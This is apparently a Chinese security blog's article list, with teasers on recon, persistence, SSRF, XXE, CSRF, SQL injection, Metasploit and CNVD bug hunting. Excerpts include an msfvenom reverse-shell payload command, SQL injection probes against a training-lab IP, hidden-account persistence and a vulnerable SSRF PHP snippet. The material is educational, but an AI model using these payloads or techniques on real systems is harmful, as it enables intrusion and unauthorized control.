- 博客(45)
- 资源 (1)
- 收藏
- 关注
RSS订阅
原创 网络安全测试之信息收集
目录1.域名相关信息1.)域名是什么?2.)域名的分类3.)域名联系人信息whois查询域名反查工具ICP备案查询2.IP相关信息1)DNS服务器的类型2.)查询IP归属3.)如何获取CDN的真实IP3.端口服务相关信息1.)端口扫描思路和代码实现查看本机端口信息远程机器端口2.)常见的端口及漏洞3.)常见的端口扫描工具Nmap4.指纹识别1.)什么是指纹识别2.识别对象3.CMS识别工具3.)CDN指纹识别..
2022-04-29 12:49:00
3029
25
原创 网络安全之权限维持(持续更新)
权限维持我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制目标。渗透流程Windows权限维持1.用户维持隐藏用户维持(影子用户)隐藏账户,顾名思义就是计算机看不到的用户(不是不存在用户只是用一般的查看方式看不到)$符号隐藏用户$符号隐藏用户就是在一个用户名后面加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持1.我们平时查看一个操作系统的几个用户的命令如下net user.
2022-05-22 00:35:12
1935
6
原创 网络安全之域信息收集(一)
域信息收集本机信息1.查询账户信息对当前主机的用户角色和用户权限进一步了解,判断是否需要提权DMZ普通用户需要提权到system用户,进行横向移动2.查询网络和端口信息根据目的主机的ip信息/网络连接/相关网络地址,初步确定网络状态win:ipconfig, netstat -anoARP路由表:arp -a路由表:route print查看dns缓存记录命令:ipconfig/displaydnslinux:ifconfig, netstat -
2022-05-18 00:06:39
451
原创 网络安全之SSRF漏洞
1.SSRF是什么<?phpfunction curl($url){ $ch = curl_init(); //设置URL和相应的选项 curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); //启用时会将头文件的信息作为数据流输出 //抓取URL并把它传给浏览器 curl_close($ch);}$url = $_GET['url'];curl
2022-05-14 00:21:29
853
原创 网络安全之XXE漏洞
XXE漏洞1.XML基础知识eXtensible Markup Language可扩展标记语言用途配置文件交换数据XML内容xml声明XML格式要求 XML文档必须有根元素 XML文档必须有关闭标签 XML标签对大小写敏感 XML元素必须被正确的嵌套 XML属性必须被加引号 XML格式校验DTD(Document Type Definition)文档类型定义DTD内容之元素...
2022-05-13 23:47:04
726
1
原创 网络安全之反序列化漏洞
一·PHP类与对象类Class一个共享相同结构和行为的对象的集合<?php class MyClass{ var $var1; var $var2 ="constant string"; function myfunc ($arg1,$arg2){ [......] } [....]}?>类的实例$baidu = new Site;$kitty = new Cat;$benz = new Car;二
2022-05-11 23:51:06
1054
3
原创 网路安全之远程代码执行漏洞
一。什么是远程代码执行?远程代码执行:Remote Code Execute后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞,不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。因此,如果需要给前端用户提供操作类的接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法远程命令执行:Remote Command Execute一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对
2022-05-11 00:30:56
3241
2
原创 应急响应实战之木马实战
一.应急响应流程回顾二.木马攻击模拟实验(特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.)1.环境介绍攻击机kali:下载地址被攻击机(注意关闭防火墙)win10:下载地址:木马脚本源码msfvenom -a -x86 --platfrom windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口号 -b "\x00" -e x86/sh
2022-05-09 01:20:55
2083
7
原创 网络安全之CSRF漏洞
目录一.什么是CSRF漏洞🍔🍔🍔1.实现流程2.原理二CSRF案例分析2.CSRF漏洞的危害3.CSRF和XSS区别4.CSRF playload1)通过图片的img src属性,自动加载,发起GET请求2)构建一个超链接,用户点击以后,发起GET请求3)构建一个隐藏表单,用户访问,自动提交,发起POST请求三CSRF漏洞挖掘1.检测工具四CSRF漏洞防御1.防御思路a。我们能不能区分一个请求是来自于自己的前端页面,还是第三方的网站?HTT
2022-05-08 00:28:32
1657
1
原创 网络安全之文件上传漏洞
一.文件上传漏洞原理🐱🏍🐱🏍🐱🏍1.文件上传功能网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshell到一个Web可访问的目录上,并将恶意文件传递给如PHP解释器去执行,之后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护。2.一句话木马二..
2022-05-07 00:35:41
6576
8
原创 网络安全之Meterploit的后渗透命令
Meterpreter的常用命令1.基本命令help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起 bgkill# 杀死一个 meterpreter 脚本 bglist#提供所有正在运行的后台脚本的列表 bgrun#作为一个后台线程运行脚本 channel#显示活动频道 sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用 se
2022-05-05 22:02:10
437
4
原创 网络安全之Metasploit使用
1.Metasploit-介绍Mltasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞,攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metaspolit框架可以从一个漏洞扫描程序导入数据,使用关于有洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击,有效载荷在发现漏洞之后开发一种可行的攻击方法。其用于提取本地系统密码,安装其他软件或控制硬件的模块,这些功能很像以前的BO2K等工具所具备的功能。2.Ubuntu安装msf环境准备
2022-05-05 21:30:29
3377
7
原创 网络安全之应急响应
一.响应的流程二.分析的方向(以本人centos服务器和window10系统为演示对象模拟企业中的服务器)1.文件分析 find ls --full-time md5sum find /mmin -2 最近2分钟修改过的文件find / -mmin -2 | grep etc 最近2分钟被修改的文件并匹配关注的文件ls --full-time qqbot 查看qqbot文件的修改时间md5sum index.html 查看index.ht..
2022-05-02 21:31:15
754
9
原创 网络安全之XSS漏洞学习(持续更新)
目录1.什么是XSS?1.需要掌握的部分知识1.HTTP请求方式2.HTTP请求格式3.HTTP响应格式4.HTTP特点4.客户端的Cookie5.服务的session2.XSS分类1.*DOM*型(不经过服务器,前端js代码的利用):2.反射型:3.存储型(长久型,危害最大):1.什么是XSS?XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和..
2022-05-02 00:11:57
415
3
原创 网络安全之SQL注入学习(持续更新)
目录1.什么是SQL注入?web应用程序三层架构:视图层 + 业务逻辑层 + 数据访问层2.SQL注入中的一些小知识1.)数据库服务器层级关系:2.)SQL语句语法1。查询当前数据库服务器所有的的数据库2。选中莫个数据库3。查询当前数据库所有的表4。查询t1表所有数据3).SQL注入之MySQL数据库1.什么是SQL注入?SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中...
2022-04-30 23:41:50
1613
4
原创 CSS选择器器练习之餐厅小游戏答案和解析(下)
17 .small:last-child //伪类选择器 :last-child选择最后一个子元素18plate:nth-child(3) //伪类选择器 :nth-child 选择第n个子元素19 bento:nth-last-child(3) //伪类选择器 :nth-last-child 选着倒数第n(父元素中的位置)个同类子元素20apple:first-of-type ///伪类选择器 :first-of-type 选择同类子元素中的第一个21...
2022-04-29 12:11:55
356
原创 小迪安全笔记(一)---基础入门---概念名字
一域名1.什么是域名?2.域名在哪里注册?3.什么是二级域名多级域名?4.域名的发现对安全测试的意义?
2022-04-11 21:51:12
716
原创 CNVD通用性漏洞挖掘小知识之灰盒测试
一CNVD漏洞黑盒挖掘二CNVD原创漏洞积分与奖励(京东卡)三漏洞挖掘之后如何提交以及总结360quake: https://quake.360.cn/quake/#/indexFofa: https//fofa.so/Zoomeye:https://www.zoomeye.org/使用网络空间搜索引擎fofa,zoomeye,360quake,结合天眼查查资产进行搜索黑盒挖掘通用型漏洞(1)关键字搜索天眼查查注册资金(2)(3)cnvd查找已知漏洞厂商百度找相
2022-03-17 11:29:01
5602
原创 cnvd通用型漏洞挖掘小知识(1)
一。什么是通用型漏洞1.通用型漏洞指某个系统,软件,应用等对应的漏洞比如TP的命令执行,dz的SQL注入等等,cnvd漏洞列表展示出来的都是通用型漏洞归档漏洞证书颁发条件:(1)对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分)(除小厂商的产品,非重要APP,黑盒测试案例不满10例等不颁发证书)(注:大厂商的判断标准为(注册资金5000万以上,或者案例涉及省部级以上单位的))Tips:通用型漏洞需要提供互联网案例或者是本地代码审计证明其通用性(包括跟进函数和调试代码过程),如果
2022-03-17 11:26:59
10623
7
原创 cnvd事件型高危漏洞挖掘
1)。天眼查查备案 https://belan.tianyancha.com/查中国联通,中国电信,中国移动,中国铁塔利用备案号搜索查询更多资产Fofa搜索:icp="备案号" 利用备案号搜索出更多资产2)ico搜索3)关键字搜索Fofa结合zoomeye进行关键字搜索主要fofa与zoomeye的搜索语法不太相同,可以查看帮助如 Fofa:title=“中国铁塔”Zoomeye:title“中国铁塔”关键字body搜索:body=“中国联通”&...
2022-03-11 09:36:48
1387
原创 墨者学院手工sql注入(sql server)
1.测试是否存在sql注入219.153.49.228:47998/new_list.asp?id=2 and 1=1 回显正常219.153.49.228:47998/new_list.asp?id=2 and 1=2 回显报错存在SQL注入2.猜解字段219.153.49.228:47998/new_list.asp?id=2 order by 4 回显正常219.153.49.228:47998/new_list.asp?id=2 order by 5 ...
2022-03-09 10:39:39
412
原创 HTML和CSS的常用基础知识笔记
HTML基础知识标题标签:<h1>一级标题</h1> <h2>二级标题</h2><h3>三级标题</h3> <h4>四级标题</h4><h5>五级标题</h5> <h6>六级标题</h6>段落标签: <p>一个段落</p>换行标签: </br><body><h1...
2021-12-13 14:22:57
860
原创 墨者学院SQL手工注入
相关知识在MYSQL5.0以上版本,mysql存在一个自带的数据库,名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取一个数据库下面的表名或列名信息 table_name 表名 column_name 列名 table_schema 数据库名 information_schema.table 记录所有表名的表 information_schema.column 记录所有列名的表 info...
2021-12-11 16:52:13
484
原创 SQL注入的小知识
登录数据库mysql -u[用户名] -p[密码]查看数据库show databases;使用某个数据库use [数据库名];查看这个库里面有什么表show tables;查看table1表中所有的数据select * from table1;union联合select * from table1 where id<3 union select 1,2,3;左边右边同时执行select * from table1 where id<-3 union sele
2021-12-11 16:50:35
2503
原创 SQL注入小知识2
小知识select count(*) from table1;select rand();生成一个随机数select floor(1.56);向下取整select floor(rand()*2;取一个随机0-1的整数select floor (rand()*2)a;给这个命令取一个名字aselect * from table1 group by id ;以id来进行分组select concat(1,2,3);把字符拼接起来0x3a = :0x7e=~sel.
2021-12-11 16:50:23
264
原创 SQL的增删改查php代码
<?php$servername = "localhost";$username = "root";$password = "root";$dbname = "haha";//创建链接$con = new mysqli($servername,$username,$password,$dbname);//检查链接if($con->connect_error){ die("wo si le:".$con->connect_error);}//查$sql =...
2021-12-11 16:47:59
488
原创 (墨者学院)-主机溢出提权漏洞分析
需要的小知识大纲1、掌握文件上传的技巧;2、掌握IIS中间件存在的畸形解析漏洞;3、了解Windows系统CMD命令执行;4、了解查看操作系统安全补丁情况;5、了解Windows操作系统的文件权限设置;6、了解操作系统的溢出漏洞的提权方式;小知识具体流程1....
2021-12-11 16:35:34
3188
网络安全红队工具包总结
2022-05-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人